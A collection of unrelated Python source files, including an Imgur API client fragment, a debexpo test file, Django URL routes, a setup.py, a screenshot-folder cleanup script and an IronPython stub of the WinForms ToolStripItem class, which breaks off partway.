LOGGER.debug(f"Imgur API Next Limit Reset Timestamp: {reported_user_reset_ts}")
IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_LIMIT] \
= reported_user_limit
IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_REMAINING] \
= reported_user_remaining
IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_RESET_TIMESTAMP] \
= reported_user_reset_ts
@staticmethod
def _check_api_limits():
# This limits need to be checked according to the Imgur API docs https://apidocs.imgur.com/
# HTTP Header Description
# X-RateLimit-UserLimit Total credits that can be allocated.
# X-RateLimit-UserRemaining Total credits available.
# X-RateLimit-UserReset Timestamp (unix epoch) for when the credits will be reset.
# X-RateLimit-ClientLimit Total credits that can be allocated for the application in a day.
# X-RateLimit-ClientRemaining Total credits remaining for the application in a day.
remaining_calls = IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_REMAINING]
reset_timestamp = IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_RESET_TIMESTAMP]
if remaining_calls <= IMGUR_LIMIT_WARNING_THRESHOLD:
LOGGER.warning(f"Approaching the limit of calls allowed for the Imgur API, remaining: {remaining_calls}")
elif remaining_calls <= 0:
readable_reset_time = datetime.utcfromtimestamp(reset_timestamp).strftime('%Y-%m-%d %H:%M:%S')
raise ImgurAPICommunicationException(f"The limit of calls to the Imgur API has been reached, "
f"more call will be available at {readable_reset_time}")
@staticmethod
def get(endpoint: str, headers: dict = {}) -> dict:
# The Imgur Client ID must be set before we can do anything else
if not IMGUR_PARAMS.get(IMGUR_PARAMS_CLIENT_ID):
raise ImgurAPICommunicationException(f"The Client ID for the Imgur API is not set! Skipping {endpoint}")
# The following will throw an Exception if the limits have been met and will prevent any further call to be made
# to the Imgur API
ImgurAPI._check_api_limits()
# Add the Imgur API Client ID to the Authorization HTTP Header
if HTTP_HEADER_AUTHORIZATION not in headers:
headers[HTTP_HEADER_AUTHORIZATION] = f"Client-ID {IMGUR_PARAMS.get(IMGUR_PARAMS_CLIENT_ID)}"
try:
LOGGER.debug(f"Querying API Imgur on {endpoint}...")
with requests.get(endpoint, headers=headers) as response:
if response.ok:
LOGGER.info('Imgur API query successful!')
ImgurAPI._update_api_limits(response)
data = json.loads(response.text)
return data
else:
raise ImgurAPICommunicationException(
f"Failed to download, we got an HTTP {response.status_code} error "
f"saying {response.text} for {endpoint}")
except requests.exceptions.ConnectionError as ex:
LOGGER.error(ex)
raise ImgurAPICommunicationException(f"Couldn't connect to {endpoint}, because of {str(ex)}")
# Sample Imgur Response
# {
# "data": {
# "id": "7W1xjas",
# "title": null,
# "description": null,
# "datetime": 1541129695,
# "type": "image/jpeg",
# "animated": false,
# "width": 640,
# "height": 691,
# "size": 123980,
# "views": 29125,
# "bandwidth": 3610917500,
# "vote": null,
# "favorite": false,
# "nsfw": true,
# "section": "hentai",
# "account_url": null,
# "account_id": null,
# "is_ad": false,
# "in_most_viral": false,
# "has_sound": false,
# "tags": [],
# "ad_type": 0,
# "ad_url": "",
# "in_gallery": false,
# "link": "https://i.imgur.com/7W1xjas.jpg"
# },
# "success": true,
# "status": 200
# } | 7,377 | 2,393 |
# -*- coding: utf-8 -*-
#
# test_utils.py — Test cases for debexpo.lib.utils
#
# This file is part of debexpo - https://alioth.debian.org/projects/debexpo/
#
# Copyright © 2008 Jonny Lamb <jonny@debian.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
Test cases for debexpo.lib.utils.
"""
__author__ = 'Jonny Lamb'
__copyright__ = 'Copyright © 2008 Jonny Lamb'
__license__ = 'MIT'
from unittest import TestCase
from debexpo.lib.utils import *
from debexpo.lib.changes import Changes
class TestUtilsController(TestCase):
def testParseSection(self):
"""
Tests debexpo.lib.utils.parse_section.
"""
t = parse_section
self.assertEqual(t('section'), ['main', 'section'])
self.assertEqual(t('component/section'), ['component', 'section'])
def testGetPackageDir(self):
"""
Tests debexpo.lib.utils.get_package_dir.
"""
t = get_package_dir
self.assertEqual(t('foo'), 'f/foo')
self.assertEqual(t('libfoo'), 'libf/libfoo')
def testMd5sum(self):
"""
Tests debexpo.lib.utils.md5sum.
"""
self.assertEqual(md5sum('debexpo/tests/changes/synce-hal_0.1-1_source.changes'), 'fbb0b9c81f8a4fa9b8e3b789cf3b5220')
| 2,305 | 812 |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^page/(\d+)/$', views.page, name='index'),
url(r'^(\d+)/$', views.detail, name='index'),
url(r'^(\d+)/bloods/$', views.blood_detail, name='index'),
url(r'^(\d+)/donors/$', views.donor_detail, name='index'),
]
| 354 | 147 |
from __future__ import print_function
import pyignore
try: from distutils.core import setup
except ImportError: from setuptools import setup
setup(
name='pyignore',
version=pyignore.__version__,
license="MIT",
description='parse .gitignore file',
author='codeskyblue',
author_email='codeskyblue@gmail.com',
url='http://github.com/codeskyblue/pyignore',
py_modules=['pyignore'],
install_requires=[],
)
| 466 | 138 |
import os
if __name__ == "__main__":
screen_dir = r"C:\Users\collv\Pictures\Screenshots"
for f in os.listdir(screen_dir):
os.remove(os.path.join(screen_dir, f)) | 177 | 70 |
class ToolStripItem(Component,IComponent,IDisposable,IDropTarget,ISupportOleDropSource,IArrangedElement):
""" Represents the abstract base class that manages events and layout for all the elements that a System.Windows.Forms.ToolStrip or System.Windows.Forms.ToolStripDropDown can contain. """
def CreateAccessibilityInstance(self,*args):
"""
CreateAccessibilityInstance(self: ToolStripItem) -> AccessibleObject
Creates a new accessibility object for the System.Windows.Forms.ToolStripItem.
Returns: A new System.Windows.Forms.AccessibleObject for the System.Windows.Forms.ToolStripItem.
"""
pass
def Dispose(self):
"""
Dispose(self: ToolStripItem,disposing: bool)
Releases the unmanaged resources used by the System.Windows.Forms.ToolStripItem and optionally
releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def DoDragDrop(self,data,allowedEffects):
"""
DoDragDrop(self: ToolStripItem,data: object,allowedEffects: DragDropEffects) -> DragDropEffects
Begins a drag-and-drop operation.
data: The object to be dragged.
allowedEffects: The drag operations that can occur.
Returns: One of the System.Windows.Forms.DragDropEffects values.
"""
pass
def GetCurrentParent(self):
"""
GetCurrentParent(self: ToolStripItem) -> ToolStrip
Retrieves the System.Windows.Forms.ToolStrip that is the container of the current
System.Windows.Forms.ToolStripItem.
Returns: A System.Windows.Forms.ToolStrip that is the container of the current
System.Windows.Forms.ToolStripItem.
"""
pass
def GetPreferredSize(self,constrainingSize):
"""
GetPreferredSize(self: ToolStripItem,constrainingSize: Size) -> Size
Retrieves the size of a rectangular area into which a control can be fit.
constrainingSize: The custom-sized area for a control.
Returns: A System.Drawing.Size ordered pair,representing the width and height of a rectangle.
"""
pass
def GetService(self,*args):
"""
GetService(self: Component,service: Type) -> object
Returns an object that represents a service provided by the System.ComponentModel.Component or
by its System.ComponentModel.Container.
service: A service provided by the System.ComponentModel.Component.
Returns: An System.Object that represents a service provided by the System.ComponentModel.Component,or
null if the System.ComponentModel.Component does not provide the specified service.
"""
pass
def Invalidate(self,r=None):
"""
Invalidate(self: ToolStripItem,r: Rectangle)
Invalidates the specified region of the System.Windows.Forms.ToolStripItem by adding it to the
update region of the System.Windows.Forms.ToolStripItem,which is the area that will be
repainted at the next paint operation,and causes a paint message to be sent to the
System.Windows.Forms.ToolStripItem.
r: A System.Drawing.Rectangle that represents the region to invalidate.
Invalidate(self: ToolStripItem)
Invalidates the entire surface of the System.Windows.Forms.ToolStripItem and causes it to be
redrawn.
"""
pass
def IsInputChar(self,*args):
"""
IsInputChar(self: ToolStripItem,charCode: Char) -> bool
Determines whether a character is an input character that the item recognizes.
charCode: The character to test.
Returns: true if the character should be sent directly to the item and not preprocessed; otherwise,false.
"""
pass
def IsInputKey(self,*args):
"""
IsInputKey(self: ToolStripItem,keyData: Keys) -> bool
Determines whether the specified key is a regular input key or a special key that requires
preprocessing.
keyData: One of the System.Windows.Forms.Keys values.
Returns: true if the specified key is a regular input key; otherwise,false.
"""
pass
def MemberwiseClone(self,*args):
"""
MemberwiseClone(self: MarshalByRefObject,cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity,which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone,which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def OnAvailableChanged(self,*args):
"""
OnAvailableChanged(self: ToolStripItem,e: EventArgs)
Raises the AvailableChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackColorChanged(self,*args):
"""
OnBackColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBoundsChanged(self,*args):
"""
OnBoundsChanged(self: ToolStripItem)
Occurs when the System.Windows.Forms.ToolStripItem.Bounds property changes.
"""
pass
def OnClick(self,*args):
"""
OnClick(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.Click event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDisplayStyleChanged(self,*args):
"""
OnDisplayStyleChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.DisplayStyleChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDoubleClick(self,*args):
"""
OnDoubleClick(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.DoubleClick event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDragDrop(self,*args):
"""
OnDragDrop(self: ToolStripItem,dragEvent: DragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragDrop event.
dragEvent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragEnter(self,*args):
"""
OnDragEnter(self: ToolStripItem,dragEvent: DragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragEnter event.
dragEvent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragLeave(self,*args):
"""
OnDragLeave(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDragOver(self,*args):
"""
OnDragOver(self: ToolStripItem,dragEvent: DragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragOver event.
dragEvent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnEnabledChanged(self,*args):
"""
OnEnabledChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.EnabledChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnFontChanged(self,*args):
"""
OnFontChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnForeColorChanged(self,*args):
"""
OnForeColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.ForeColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnGiveFeedback(self,*args):
"""
OnGiveFeedback(self: ToolStripItem,giveFeedbackEvent: GiveFeedbackEventArgs)
Raises the System.Windows.Forms.ToolStripItem.GiveFeedback event.
giveFeedbackEvent: A System.Windows.Forms.GiveFeedbackEventArgs that contains the event data.
"""
pass
def OnLayout(self,*args):
"""
OnLayout(self: ToolStripItem,e: LayoutEventArgs)
Raises the System.Windows.Forms.Control.Layout event.
e: A System.Windows.Forms.LayoutEventArgs that contains the event data.
"""
pass
def OnLocationChanged(self,*args):
"""
OnLocationChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.LocationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseDown(self,*args):
"""
OnMouseDown(self: ToolStripItem,e: MouseEventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseDown event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseEnter(self,*args):
"""
OnMouseEnter(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseEnter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseHover(self,*args):
"""
OnMouseHover(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseHover event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseLeave(self,*args):
"""
OnMouseLeave(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseMove(self,*args):
"""
OnMouseMove(self: ToolStripItem,mea: MouseEventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseMove event.
mea: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseUp(self,*args):
"""
OnMouseUp(self: ToolStripItem,e: MouseEventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseUp event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnOwnerChanged(self,*args):
"""
OnOwnerChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.OwnerChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnOwnerFontChanged(self,*args):
"""
OnOwnerFontChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event when the
System.Windows.Forms.ToolStripItem.Font property has changed on the parent of the
System.Windows.Forms.ToolStripItem.
e: A System.EventArgs that contains the event data.
"""
pass
def OnPaint(self,*args):
"""
OnPaint(self: ToolStripItem,e: PaintEventArgs)
Raises the System.Windows.Forms.ToolStripItem.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnParentBackColorChanged(self,*args):
"""
OnParentBackColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentChanged(self,*args):
"""
OnParentChanged(self: ToolStripItem,oldParent: ToolStrip,newParent: ToolStrip)
Raises the System.Windows.Forms.Control.ParentChanged event.
oldParent: The original parent of the item.
newParent: The new parent of the item.
"""
pass
def OnParentEnabledChanged(self,*args):
"""
OnParentEnabledChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.EnabledChanged event when the
System.Windows.Forms.ToolStripItem.Enabled property value of the item's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentForeColorChanged(self,*args):
"""
OnParentForeColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.ForeColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentRightToLeftChanged(self,*args):
"""
OnParentRightToLeftChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.RightToLeftChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnQueryContinueDrag(self,*args):
"""
OnQueryContinueDrag(self: ToolStripItem,queryContinueDragEvent: QueryContinueDragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.QueryContinueDrag event.
queryContinueDragEvent: A System.Windows.Forms.QueryContinueDragEventArgs that contains the event data.
"""
pass
def OnRightToLeftChanged(self,*args):
"""
OnRightToLeftChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.RightToLeftChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTextChanged(self,*args):
"""
OnTextChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.TextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnVisibleChanged(self,*args):
"""
OnVisibleChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.VisibleChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def PerformClick(self):
"""
PerformClick(self: ToolStripItem)
Activates the System.Windows.Forms.ToolStripItem when it is clicked with the mouse.
"""
pass
def ProcessCmdKey(self,*args):
"""
ProcessCmdKey(self: ToolStripItem,m: Message,keyData: Keys) -> (bool,Message)
Processes a command key.
m: A System.Windows.Forms.Message,passed by reference,that represents the window message to
process.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: false in all cases.
"""
pass
def ProcessDialogKey(self,*args):
"""
ProcessDialogKey(self: ToolStripItem,keyData: Keys) -> bool
Processes a dialog key.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the key was processed by the item; otherwise,false.
"""
pass
def ProcessMnemonic(self,*args):
"""
ProcessMnemonic(self: ToolStripItem,charCode: Char) -> bool
Processes a mnemonic character.
charCode: The character to process.
Returns: true in all cases.
"""
pass
def ResetBackColor(self):
"""
ResetBackColor(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetDisplayStyle(self):
"""
ResetDisplayStyle(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetFont(self):
"""
ResetFont(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetForeColor(self):
"""
ResetForeColor(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetImage(self):
"""
ResetImage(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetMargin(self):
"""
ResetMargin(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetPadding(self):
"""
ResetPadding(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetRightToLeft(self):
"""
ResetRightToLeft(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetTextDirection(self):
"""
ResetTextDirection(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def Select(self):
"""
Select(self: ToolStripItem)
Selects the item.
"""
pass
def SetBounds(self,*args):
"""
SetBounds(self: ToolStripItem,bounds: Rectangle)
Sets the size and location of the item.
bounds: A System.Drawing.Rectangle that represents the size and location of the
System.Windows.Forms.ToolStripItem
"""
pass
def SetVisibleCore(self,*args):
"""
SetVisibleCore(self: ToolStripItem,visible: bool)
Sets the System.Windows.Forms.ToolStripItem to the specified visible state.
visible: true to make the System.Windows.Forms.ToolStripItem visible; otherwise,false.
"""
pass
def ToString(self):
"""
ToString(self: ToolStripItem) -> str
Returns: A System.String containing the name of the System.ComponentModel.Component,if any,or null if
the System.ComponentModel.Component is unnamed.
"""
pass
def __enter__(self,*args):
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self,*args):
"""
__exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(cls: type)
__new__(cls: type,text: str,image: Image,onClick: EventHandler)
__new__(cls: type,text: str,image: Image,onClick: EventHandler,name: str)
"""
pass
def __str__(self,*args):
pass
AccessibilityObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the System.Windows.Forms.AccessibleObject assigned to the control.
Get: AccessibilityObject(self: ToolStripItem) -> AccessibleObject
"""
AccessibleDefaultActionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the default action description of the control for use by accessibility client applications.
Get: AccessibleDefaultActionDescription(self: ToolStripItem) -> str
Set: AccessibleDefaultActionDescription(self: ToolStripItem)=value
"""
AccessibleDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the description that will be reported to accessibility client applications.
Get: AccessibleDescription(self: ToolStripItem) -> str
Set: AccessibleDescription(self: ToolStripItem)=value
"""
AccessibleName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the name of the control for use by accessibility client applications.
Get: AccessibleName(self: ToolStripItem) -> str
Set: AccessibleName(self: ToolStripItem)=value
"""
AccessibleRole=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the accessible role of the control,which specifies the type of user interface element of the control.
Get: AccessibleRole(self: ToolStripItem) -> AccessibleRole
Set: AccessibleRole(self: ToolStripItem)=value
"""
Alignment=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the item aligns towards the beginning or end of the System.Windows.Forms.ToolStrip.
Get: Alignment(self: ToolStripItem) -> ToolStripItemAlignment
Set: Alignment(self: ToolStripItem)=value
"""
AllowDrop=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether drag-and-drop and item reordering are handled through events that you implement.
Get: AllowDrop(self: ToolStripItem) -> bool
Set: AllowDrop(self: ToolStripItem)=value
"""
Anchor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the edges of the container to which a System.Windows.Forms.ToolStripItem is bound and determines how a System.Windows.Forms.ToolStripItem is resized with its parent.
Get: Anchor(self: ToolStripItem) -> AnchorStyles
Set: Anchor(self: ToolStripItem)=value
"""
AutoSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the item is automatically sized.
Get: AutoSize(self: ToolStripItem) -> bool
Set: AutoSize(self: ToolStripItem)=value
"""
AutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether to use the System.Windows.Forms.ToolStripItem.Text property or the System.Windows.Forms.ToolStripItem.ToolTipText property for the System.Windows.Forms.ToolStripItem ToolTip.
Get: AutoToolTip(self: ToolStripItem) -> bool
Set: AutoToolTip(self: ToolStripItem)=value
"""
Available=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem should be placed on a System.Windows.Forms.ToolStrip.
Get: Available(self: ToolStripItem) -> bool
Set: Available(self: ToolStripItem)=value
"""
BackColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the background color for the item.
Get: BackColor(self: ToolStripItem) -> Color
Set: BackColor(self: ToolStripItem)=value
"""
BackgroundImage=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the background image displayed in the item.
Get: BackgroundImage(self: ToolStripItem) -> Image
Set: BackgroundImage(self: ToolStripItem)=value
"""
BackgroundImageLayout=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the background image layout used for the System.Windows.Forms.ToolStripItem.
Get: BackgroundImageLayout(self: ToolStripItem) -> ImageLayout
Set: BackgroundImageLayout(self: ToolStripItem)=value
"""
Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the size and location of the item.
Get: Bounds(self: ToolStripItem) -> Rectangle
"""
CanRaiseEvents=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the component can raise an event.
"""
CanSelect=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the item can be selected.
Get: CanSelect(self: ToolStripItem) -> bool
"""
ContentRectangle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the area where content,such as text and icons,can be placed within a System.Windows.Forms.ToolStripItem without overwriting background borders.
Get: ContentRectangle(self: ToolStripItem) -> Rectangle
"""
DefaultAutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether to display the System.Windows.Forms.ToolTip that is defined as the default.
"""
DefaultDisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating what is displayed on the System.Windows.Forms.ToolStripItem.
"""
DefaultMargin=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the default margin of an item.
"""
DefaultPadding=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the internal spacing characteristics of the item.
"""
DefaultSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the default size of the item.
"""
DesignMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DismissWhenClicked=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether items on a System.Windows.Forms.ToolStripDropDown are hidden after they are clicked.
"""
DisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets whether text and images are displayed on a System.Windows.Forms.ToolStripItem.
Get: DisplayStyle(self: ToolStripItem) -> ToolStripItemDisplayStyle
Set: DisplayStyle(self: ToolStripItem)=value
"""
Dock=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets which System.Windows.Forms.ToolStripItem borders are docked to its parent control and determines how a System.Windows.Forms.ToolStripItem is resized with its parent.
Get: Dock(self: ToolStripItem) -> DockStyle
Set: Dock(self: ToolStripItem)=value
"""
DoubleClickEnabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem can be activated by double-clicking the mouse.
Get: DoubleClickEnabled(self: ToolStripItem) -> bool
Set: DoubleClickEnabled(self: ToolStripItem)=value
"""
Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the parent control of the System.Windows.Forms.ToolStripItem is enabled.
Get: Enabled(self: ToolStripItem) -> bool
Set: Enabled(self: ToolStripItem)=value
"""
Events=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
Font=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the font of the text displayed by the item.
Get: Font(self: ToolStripItem) -> Font
Set: Font(self: ToolStripItem)=value
"""
ForeColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the foreground color of the item.
Get: ForeColor(self: ToolStripItem) -> Color
Set: ForeColor(self: ToolStripItem)=value
"""
Height=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the height,in pixels,of a System.Windows.Forms.ToolStripItem.
Get: Height(self: ToolStripItem) -> int
Set: Height(self: ToolStripItem)=value
"""
Image=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the image that is displayed on a System.Windows.Forms.ToolStripItem.
Get: Image(self: ToolStripItem) -> Image
Set: Image(self: ToolStripItem)=value
"""
ImageAlign=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the alignment of the image on a System.Windows.Forms.ToolStripItem.
Get: ImageAlign(self: ToolStripItem) -> ContentAlignment
Set: ImageAlign(self: ToolStripItem)=value
"""
ImageIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the index value of the image that is displayed on the item.
Get: ImageIndex(self: ToolStripItem) -> int
Set: ImageIndex(self: ToolStripItem)=value
"""
ImageKey=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the key accessor for the image in the System.Windows.Forms.ToolStrip.ImageList that is displayed on a System.Windows.Forms.ToolStripItem.
Get: ImageKey(self: ToolStripItem) -> str
Set: ImageKey(self: ToolStripItem)=value
"""
ImageScaling=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether an image on a System.Windows.Forms.ToolStripItem is automatically resized to fit in a container.
Get: ImageScaling(self: ToolStripItem) -> ToolStripItemImageScaling
Set: ImageScaling(self: ToolStripItem)=value
"""
ImageTransparentColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the color to treat as transparent in a System.Windows.Forms.ToolStripItem image.
Get: ImageTransparentColor(self: ToolStripItem) -> Color
Set: ImageTransparentColor(self: ToolStripItem)=value
"""
IsDisposed=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the object has been disposed of.
Get: IsDisposed(self: ToolStripItem) -> bool
"""
IsOnDropDown=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the container of the current System.Windows.Forms.Control is a System.Windows.Forms.ToolStripDropDown.
Get: IsOnDropDown(self: ToolStripItem) -> bool
"""
IsOnOverflow=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Windows.Forms.ToolStripItem.Placement property is set to System.Windows.Forms.ToolStripItemPlacement.Overflow.
Get: IsOnOverflow(self: ToolStripItem) -> bool
"""
Margin=property(lambda self: object(),lambda self,v: None,lambda self: None)
